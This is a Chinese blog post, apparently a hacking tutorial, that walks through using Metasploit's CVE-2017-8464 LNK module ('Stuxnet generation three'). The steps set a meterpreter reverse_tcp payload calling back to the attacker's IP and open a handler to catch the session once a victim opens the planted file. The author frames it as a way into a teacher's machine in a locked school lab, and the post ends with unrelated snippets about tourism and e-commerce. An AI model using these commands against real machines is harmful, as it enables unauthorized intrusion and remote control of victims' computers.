震网
笔者在最近想了个问题,学校机房关闭进不去,然后教师机子无ip如何黑入,而且不在同一个网段下面,如何入侵呢,于是看到了一篇关于隔离网络攻击的文章。想到了一年前一个漏洞,于是测试开始。
首先我们来了解一下“震网三代”
它可以利用移动介质,受害者只要开启了自动播放或者点击了漏洞触发就会使系统触发漏洞。
环境:
ubuntu16.04
vmware14 and win7 (x64)
msf
首先我们开一下msf然后搜索一下cve编号
use use exploit/windows/fileformat/cve_2017_8464_lnk_rce
然后我们需要一些参数。
set payload windows/meterpreter/reverse_tcp
set lhost (自己ip)
exploit
不建议ubuntu下非root账户生成此exp(会发现移动不了文件夹而导致浪费时间。)
如果你不确定u盘是哪个盘符,这些保存下来也不是坏事。
ubuntu建议非root下运行msf并生成该漏洞所需exp进行测试
生成所需的exp后,终端下移动文件夹到可见目录(.msf4是隐藏目录)
然后移动到虚拟机里面。
FlashPlayerCPLAPP.cpi才是我们关注的地方。
use exploit/multi/handler
设置完自己的ip和payload后我们run
在虚拟机上双击打开cpi后我们会获得一个meterpreter会话。
测试到此结束
请勿将技术利用在非法的用途上。
出了事情本人一概不负责。
相关阅读
市场1.1目前现状统计显示,2013 年中国旅游市场总交易额约为29475亿元,其中在线旅行市场交易额约为2522亿元。 在线机票业务总交易额
昨天在草莓音乐节躁了一天,淼叔颇有感触(不是感觉!),简单整理了下思路,分享一些。另外今天打算去的同学请先拉到文末,那里有一些参加音乐
目前,人们的生活节奏加快,特别是一些年轻的人们很少有时间去实体店购买东西,都喜欢上网去淘。很多人看准这个商机,纷纷开了一家属于自
科特勒说:商务的主要核心是营销。比尔·盖茨说:二十一世纪要么电子商务,要么无商可务。那么,电子商务的主要核心是什么呢?答案